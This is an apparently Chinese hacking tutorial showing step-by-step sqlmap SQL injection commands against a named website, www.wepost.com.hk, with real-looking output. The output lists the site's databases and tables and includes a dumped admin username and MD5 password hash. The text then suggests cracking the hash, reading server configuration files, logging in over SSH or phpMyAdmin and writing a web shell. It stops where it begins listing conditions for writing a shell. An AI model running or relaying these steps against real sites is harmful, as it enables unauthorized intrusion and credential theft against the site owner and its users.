sqlmap进行mysql注入root权限读写文件

　　1.在BT5 R2下root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 -f -b --current-user --current-db -v 1 /*获取当前用户和当前数据库

　　返回结果 :

　　[02:42:20] [INFO] fetching current user current user: 'root@localhost' [02:42:21]

　　[INFO] fetching current database current database: 'wepost'

　　//当前用户为 root 当前数据库为 wepost

　　2.root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbs -v 2

　　//获取所有数据库 返回结果 : available databases [8]: [*] bb [*] cart [*] information_schema [*] mysql [*] taipotour [*] test [*] wepost [*] wepost2 看结果可以也可以知道 当前存在8个数据库

　　3.root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --tables -D wepost -v 2

　　//获取wepost数据库(也就是当前数据库)的所有表名 返回结果 : Database: wepost [6 tables]| admin | | article | | contributor | | idea | | image | | issue |看结果可以也可以知道 存在6个表

　　4.root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --columns -D wepost -T admin -v 2

　　//获取wepost数据库里admin表的字段 返回结果 : Database: wepost Table: admin [4 columns]|id|int(11)|password|varchar(32)|type|varchar(10)|userid|varchar(20)看结果可以也可以知道 存在4个字段

　　5.root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dump -D "wepost" -T "admin" -C "userid,password" -s "sqlnmapdb.log" -v -v 2

　　//获取wepost数据库里 admin表里 userid和password字段里面的内容 并将数据保存下来 /pentest/database/sqlmap/output/www.wepost.com.hk 返回结果 : Database: wepost Table: admin [1 entry]| password | userid | |7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |

　　[03:08:51] [INFO] Table 'wepost.admin' dumped to CSV file '/pentest/database/sqlmap/output/www.wepost.com.hk/dump/wepost/admin.csv'

　　[03:08:51] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.wepost.com.hk'

　　//得到帐号密码|7d4d7589db8b28e04db0982dd0e92189|wepost2010|破MD5找后台去吧。。。

　　// mysql既然是root权限 当然可以试着写shell或者读文件 (一般读都是读apache配置文件找网站路径 网站配置文件获取root密码尝试社工直接登录linux的ssh或者登录phpmyadmin登录执行sql语句写shell 或者读其他铭感信息) root权限写shell的3个条件：